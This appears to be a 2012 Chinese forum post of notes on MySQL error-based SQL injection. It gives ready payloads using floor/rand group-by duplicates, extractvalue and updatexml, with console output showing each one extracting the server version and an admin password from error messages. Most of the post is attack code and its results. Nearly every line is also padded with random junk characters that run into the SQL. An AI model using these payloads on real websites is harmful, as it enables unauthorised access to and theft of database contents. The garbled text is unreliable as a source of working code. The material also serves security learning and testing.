放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。: S c9 R3 m( v Y ^/ |7 A
实际测试环境:1 i' b+ [, q% H9 A4 l- H8 x
% z! y6 I7 z2 J ]1 O$ y4 D) Z
" P& H' ]& Q/ ^4 J" }$ wmysql> show tables;* L+ c4 L# r- u6 R
+----------------+
* v( N" [; u! X' w9 P7 ~' Z8 r| Tables_in_test |
$ n; B* z* X! U( v# C% q+----------------+3 t6 ?" {' U. Y5 s% d2 _5 N
| admin |: m/ Z. k/ N4 | D
| article |
4 l$ A( Q; n. S8 U2 R( k+----------------+
5 M/ A! Y( S, A$ s9 |& x9 S
* e, c! f& Z' j2 }6 ?6 I- h/ o 2 g T8 z: _& }
% E: v; N* Z7 H/ {, ^$ V
mysql> describe admin;
. b: \; v9 {8 B4 l+-------+------------------+------+-----+---------+----------------+3 A$ R7 @5 V" S1 ?1 o) o; T7 n* q
| Field | Type | Null | Key | Default | Extra |
+ r; A. C! C) u. I2 Y) x: s+-------+------------------+------+-----+---------+----------------+
8 m# s2 X2 `) b5 g0 ]; n' ~9 g6 g| id | int(10) unsigned | NO | PRI | NULL | auto_increment |4 ~8 |6 ^/ ?# ~& k
| user | varchar(50) | NO | | NULL | |) b5 P# v- `! G. e
| pass | varchar(50) | NO | | NULL | |
* D* @) _2 ^' y9 U2 M! n% F+-------+------------------+------+-----+---------+----------------+
/ V) l! f2 h* y# |3 e 5 h& \: [6 A" i; z
% G5 g2 \8 z% P% X9 u- q5 f" f/ l
! d u, o. ?7 I/ Jmysql> describe article;# `8 k2 u8 u% e' Y
+---------+------------------+------+-----+---------+----------------+
( [/ [& J5 D! p$ {. R| Field | Type | Null | Key | Default | Extra |
M1 @8 W) @$ }5 I1 O2 {! l+---------+------------------+------+-----+---------+----------------+
) x* C A$ W4 t$ V| id | int(10) unsigned | NO | PRI | NULL | auto_increment | ~0 I, T# k" B
| title | varchar(50) | NO | | NULL | |
# h2 t8 C& ]. z4 d4 H0 w4 X+ l+ n& l| content | varchar(50) | NO | | NULL | |
% x( a! ~/ a/ P9 Q+---------+------------------+------+-----+---------+----------------+
2 F) e6 _- @' T, e& |1、通过floor报错
- [8 c& P, ^% u9 |! z. z! C可以通过如下一些利用代码
& ^& Z& ?( R" x7 } 6 ]! K9 L* b$ ~) y7 a
5 \6 i' W) D1 A! U. g1 L/ I7 Z; x
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
7 e. T5 ]) m: yfrom information_schema.tables group by x)a);' F3 u4 O' r7 d& E2 h: X/ V
- v4 l. A! Z g8 U0 I9 e( m 8 C" j5 o" N! r3 I$ ?
and (select count(*) from (select 1 union select null union select !1)x1 o* L% u2 f+ |' S# ]2 I
group by concat((select table_name from information_schema.tables limit 1),
, x- \7 d1 P2 A1 [floor(rand(0)*2)));
. k: M. n7 Y) Z% ?举例如下:2 W; l) a& o! d7 i) k
首先进行正常查询:7 t k: _: P% L/ D9 R; o! B. r% ~
3 t+ a l" ~9 n: K. mmysql> select * from article where id = 1;
/ F% D1 _$ G) h' l3 A* s0 z% f5 A+----+-------+---------+
# d \0 Y6 R! S8 p, e* h| id | title | content |# G* \) I$ Q0 ], O4 B& I& ~8 O4 Y, Z
+----+-------+---------+$ ?6 h0 T+ ]0 m! d, h) A
| 1 | test | do it |6 i& F+ n$ ] M: p
+----+-------+---------+
~; L$ s( T, H2 |% [/ e假如id输入存在注入的话,可以通过如下语句进行报错。
& E4 O+ A/ O# `( [9 I) s5 `0 u) p & N- M. b8 K9 W; d; j6 S, k; M+ Z
( b& g9 _- [' R( Q7 ^5 _& a1 Rmysql> select * from article where id = 1 and (select 1 from
& a' h% O* }/ }(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
% Q* D" z$ x. }4 t: AERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' K! B8 w' \" n2 \( |. V
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
, h3 x5 L2 c9 H1 ?" P: w例如我们需要查询管理员用户名和密码:4 i# s$ h b$ h5 L- _! Q
Method1:
) i, t, ^7 W2 o% c' [% F8 l/ v 7 I* S' {3 g. Z; V8 k
A0 E! I$ |# f. \; dmysql> select * from article where id = 1 and (select 1 from
9 z0 E$ N$ ^; W) W3 ]8 Y& G(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x5 b5 K6 b4 j" m8 T4 p8 p# o
from information_schema.tables group by x)a);
7 W9 W! Z/ L, k3 e9 i7 hERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
8 k( j3 P: c3 X7 q/ @- cMethod2:3 E3 n7 L/ ]3 C8 g4 C8 F2 ?- H
1 d# L* o( }1 {$ u8 z5 Y+ u
; L* c: T- g( xmysql> select * from article where id = 1 and (select count(*)
7 @) h5 B# S6 Z$ J5 F# L! hfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
& @! q& v% W( Yfloor(rand(0)*2)));
0 y' _1 X6 q/ R$ {, vERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2 @) ]/ Y1 A5 b+ d8 b9 R2、ExtractValue
# |$ u3 j6 V+ C) {4 n2 V# L* I* N测试语句如下
8 o& b* {4 W- ~$ k 6 L2 s1 K* n8 }8 \
" c5 t w0 q+ C& d8 y$ Q
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));& d0 _% O. {) P3 \
实际测试过程3 _6 S- J+ b9 @0 Q$ W
9 z4 X4 d. i' t: E0 ~ 0 x% k# _7 d. P `1 q& p. a! Z' K7 X
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,$ ]) C6 I: n+ S9 G4 C5 t
(select pass from admin limit 1)));--
. A* D- \+ v) b* e: KERROR 1105 (HY000): XPATH syntax error: '\admin888'2 V2 U* ]8 {# y% b
3、UpdateXml
; _; ]$ `- E$ l8 k- |- r- ^5 `测试语句1 I$ g6 I/ Y* j# U8 v8 \' _
$ Z4 v* C: r. I
* M% f2 |1 j. F
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
* i; a5 x6 }+ q- K: L" O f实际测试过程7 x% ?+ q5 v5 a9 A0 ~+ n X# H
! ]$ @& S) q- y. f4 k
6 \* c1 D) M0 O9 p% _& y v, G9 C Nmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
9 j' l! K5 Y. L& J3 k& g(select pass from admin limit 1),0x5e24),1));6 P3 Z3 ^5 z; H9 j- @; g9 x/ W, M! x( H
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'2 X. D+ }& ]3 H' X6 p! D' n
All, thanks foreign guys.& S6 I7 E$ }2 N" o2 x" ?
& K' t. ~5 T& s
, n, T( n2 `, G
|
发表于 2012-12-10 10:28:51
收藏
支持
反对